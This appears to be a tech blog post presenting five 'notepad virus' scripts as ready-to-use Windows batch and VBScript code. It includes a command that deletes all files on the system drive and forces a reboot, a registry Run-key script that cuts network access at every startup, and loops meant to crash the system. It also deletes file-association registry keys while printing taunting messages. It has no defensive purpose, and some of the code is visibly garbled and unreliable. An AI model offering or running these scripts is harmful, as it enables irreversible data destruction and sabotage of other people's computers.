A computer virus is a type of malicious software program that, when executed, replicates itself. It modifies other computer programs and inserting its own code. When this replication succeeds, the affected areas are then said to be “infected” with a computer virus. Here are the five codes for creating system crash. Here are some top notepad codes to create a virus in no time.
1.Drive Delete
This code will delete all the files from your drive. Just copy the code in notepad and save it as with extension .bat
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
2. Disable Internet permanently
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoft ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwi rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
This code will permanently disable the internet connection on the system. Save as above save the file with .bat extension.
3.Crash the system
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
This code will crash the system. Save the code file with a .vbs extension.
4.Infinite Notepad
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
This code will open infinite or multiple windows of the notepad or you can change it according to the desired software you wanted to open multiple times. This code will run until the system crashes. Paste the code in notepad and save it with a .bat extension
5.Delete Registry key Files
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE
This code will delete all the registry entries from the system and they are further cannot be recovered. Copy the code in notepad and save it with a .bat extension.
How to save a batch file
For more awesome Tech Content Like us on Facebook, Follow us on Twitter, Instagram, Pinterest and Subscribe to Our YouTube Channel.